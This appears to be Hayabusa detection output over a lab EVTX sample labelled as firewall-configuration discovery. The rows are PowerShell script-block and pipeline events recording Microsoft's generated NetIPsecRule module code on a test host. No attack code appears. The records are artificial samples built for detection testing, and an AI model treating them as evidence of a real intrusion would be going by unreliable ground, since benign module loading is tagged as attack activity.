[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 